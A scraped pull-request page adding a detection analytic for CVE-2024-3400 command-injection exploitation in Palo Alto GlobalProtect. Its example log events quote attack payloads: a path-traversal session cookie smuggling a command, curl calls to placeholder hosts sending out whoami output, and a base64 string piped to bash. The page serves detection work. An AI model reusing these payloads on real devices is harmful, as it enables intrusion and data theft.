Closed netgrain closed 5 months ago
Adds analytic to detect suspicious file creation activity related to the exploitation of CVE-2024-3400.
Note that CVE-2024-3400 is a chained exploit consisting of two vulnerabilities:
This analytic covers both vulnerabilities and is validated based on non-public incidents.
new: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226curl${IFS}x1.outboundhost.com;
curl${IFS}x1.outboundhost.com
/opt/panlogs/tmp/device_telemetry/hour/soTetea1curl${IFS}http://a.b.c.d/?u=$(whoami) /opt/panlogs/tmp/device_telemetry/minute/h4echo${IFS}OTYkKHVuYW1lIC1hKSA+IC92YXIvYXBwd2ViL3NzbHZwbmRvY3MvZ2xvYmFsLXByb3RlY3QvcG9ydGFsL2ltYWdlcy9wYWxvYWx0by1sb2dvLnR4dA==|base64${IFS}-d|bash${IFS}-i
curl${IFS}http://a.b.c.d/?u=$(whoami) /opt/panlogs/tmp/device_telemetry/minute/h4
Summary of the Pull Request
Adds analytic to detect suspicious file creation activity related to the exploitation of CVE-2024-3400.
Note that CVE-2024-3400 is a chained exploit consisting of two vulnerabilities:
This analytic covers both vulnerabilities and is validated based on non-public incidents.
Changelog
new: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
Example Log Event
Network request
Device log entry